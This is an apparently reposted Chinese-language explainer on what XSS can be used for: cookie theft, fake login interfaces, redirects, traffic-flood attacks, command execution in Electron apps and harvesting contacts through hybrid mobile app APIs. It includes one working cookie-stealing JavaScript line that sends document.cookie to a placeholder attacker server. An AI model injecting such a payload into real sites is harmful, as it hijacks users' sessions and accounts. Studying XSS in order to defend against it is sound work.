XSS的各类用途

0x01 最多见之窃取用户cookie

当cookie没有设置HttpOnly属性时,能够经过javascript代码建立img,script,iframe等标签,并把src属性设置为本身部署的xss cookie接收平台,以url拼接document.cookie的形式把浏览页面的用户的cookie传递给本身

由于https的网站默认不能加载http的js,因此通常都会建立img标签

var i = document.createElement('img');i.src = 'http://你的服务器地址?cookie=' + document.cookie 

0x02 界面劫持/伪造界面

攻击者能够构造html/css/javascript代码,制做出一个与原网站风格类似的登陆界面,或者把一些html元素进行移动/覆盖/遮挡,或者利用javascript的特性,从新定义页面的函数和变量,使得原来的功能被篡改

大概是两三年前,刷贴吧时发现有人曝光一个淘宝奸商,主要特色是他的商品评价只能看好评,点中差评无反应.分析了一下发现是奸商在编辑商品详情时(富文本编辑器 + 自定义行内样式),建立了一个比较大的div,遮挡住了中差评的选项

0x03 重定向页面

通常用于导流量,常见于黑产给菠菜网站导流

0x04 CC攻击

在2015年时,百度统计代码http://hm.baidu.com/h.js被劫持,其内容被加入了一个死循环并在间隔很短的时间内请求github的代码,致使大量引用了http://hm.baidu.com/h.js的网站变相对github进行CC攻击

0x05 命令执行

近年来前端飞速发展,有了能够利用html开发桌面应用的框架,表明做有electron,nw.js.主要原理就是编写好html/css/js,以electron或nw.js去启动,特色是能够调用Node.Js的内置函数,如child_process.exec(命令执行)等.

基于这2个框架开发的比较出名程序有

• vscode
• atom
• 网易云音乐
• 阿里钉钉

0x06 经过hybrid app获取手机通信录,短信,地理位置,相册等敏感信息

随着前端飞速发展,不单单是桌面开发能够利用html,手机app一样也能够利用html来开发,主要原理是经过封装系统自带的webview,给出api提供javascript调用

封装有获取通信录等原生app功能的框架有

国外的:

• React Native
• Ionic
• Cordova
• PhoneGap

国内的:

• AppCan
• APICloud
• DCloud

针对hybrid app的XSS文章目前还比较少见,大概是不多白帽子会关注这类混合app开发框架,而挖到XSS时只是当成一个普通的XSS而没有尝试探测app使用的框架,而后去翻文档尝试调用获取联系人等api?

介绍：请勿用于非法用途，本文仅供技术交流学习探讨。本文部分资源来源于网络，若有侵权请联系版主删除。